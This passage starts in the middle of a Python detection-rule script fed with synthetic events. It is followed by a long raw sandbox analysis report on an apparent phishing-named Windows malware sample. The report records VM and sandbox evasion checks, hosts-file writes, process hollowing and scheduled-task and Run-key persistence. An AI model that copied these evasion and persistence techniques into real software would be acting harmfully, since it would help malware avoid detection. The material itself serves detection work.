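          parent="C:\\Windows\\SysWOW64\\schtasks.exe",
          cmdline="C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
    Event("process", SAMPLE, parent=SAMPLE, cmdline="{path}"),
    Event("registry", SAMPLE,
          target="HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\LIhMQ"),
    Event("file", SAMPLE, target=DROPPED + ":Zone.Identifier", access="read attributes | delete"),
    # Benign control: an installer registering a task from Program Files must not fire.
    Event("process", "C:\\Windows\\System32\\schtasks.exe",
          parent="C:\\Program Files\\Vendor\\setup.exe",
          cmdline='schtasks.exe /Create /TN "Vendor\\Update" /XML "C:\\Program Files\\Vendor\\update.xml"'),
]

if __name__ == "__main__":
    for name, finding in triage(SAMPLE_EVENTS):
        print(f"[{name}] {finding}")
```

Two details matter when porting this to real telemetry. The schtasks command line as recorded has an unbalanced quote (it starts with `schtasks.exe"`), so the parser must not rely on well-formed quoting; matching `/XML` to a path under \AppData\Local\Temp\ is robust to that. And the Run-key rule keys on where the writing process lives rather than on the value data, because the report only shows the value name (LIhMQ), not its data.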

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Users\user\Desktop\statement of account.exe | File opened: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | File opened: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe:Zone.Identifier read attributes | delete
                Source: C:\Users\user\Desktop\statement of account.exe | Process information set: NOOPENFILEERRORBOX (90 identical entries in the report)
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: Yara match | File source: Process Memory Space: statement of account.exe PID: 3184, type: MEMORYSTR
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                Source: statement of account.exe, 00000000.00000002.283918247.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, LtdekfbHULJt.exe, 00000004.00000002.408840433.0000000002784000.00000004.00000800.00020000.00000000.sdmp, LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\statement of account.exe TID: 5972 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\Desktop\statement of account.exe TID: 2436 | Thread sleep time: -3689348814741908s >= -30000s
                Source: C:\Users\user\Desktop\statement of account.exe TID: 4472 | Thread sleep count: 9754 > 30
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5484 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 4124 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 4976 | Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe TID: 5176 | Thread sleep count: 9455 > 30
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5916 | Thread sleep time: -2767011611056431s >= -30000s
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe TID: 5932 | Thread sleep count: 9382 > 30
                Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                Source: C:\Users\user\Desktop\statement of account.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Thread delayed: delay time: 922337203685477
                Source: C:\Users\user\Desktop\statement of account.exe | Window / User API: threadDelayed 9754
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Window / User API: threadDelayed 9455
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Window / User API: threadDelayed 9382
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\statement of account.exe | Process information queried: ProcessInformation
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                Source: LIhMQ.exe, 0000000E.00000002.376580283.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                Source: statement of account.exe, 00000003.00000002.514549146.0000000001408000.00000004.00000020.00020000.00000000.sdmp, LIhMQ.exe, 00000013.00000002.553384981.0000000006BA0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: LtdekfbHULJt.exe, 00000016.00000002.559565864.000000000638A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program Files
                Source: C:\Users\user\Desktop\statement of account.exe | Process token adjusted: Debug
                Source: C:\Users\user\Desktop\statement of account.exe | Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Users\user\Desktop\statement of account.exe | File written: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\Desktop\statement of account.exe | Memory written: C:\Users\user\Desktop\statement of account.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Memory written: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Memory written: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp86BD.tmp
                Source: C:\Users\user\Desktop\statement of account.exe | Process created: C:\Users\user\Desktop\statement of account.exe {path}
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp4337.tmp
                Source: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe | Process created: C:\Users\user\AppData\Roaming\LtdekfbHULJt.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LtdekfbHULJt" /XML "C:\Users\user\AppData\Local\Temp\tmp26F5.tmp
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe | Process created: C:\Users\user\AppData\Roaming\LIhMQ\LIhMQ.exe {path}
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Users\user\Desktop\statement of account.exe VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
                Source: C:\Users\user\Desktop\statement of account.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
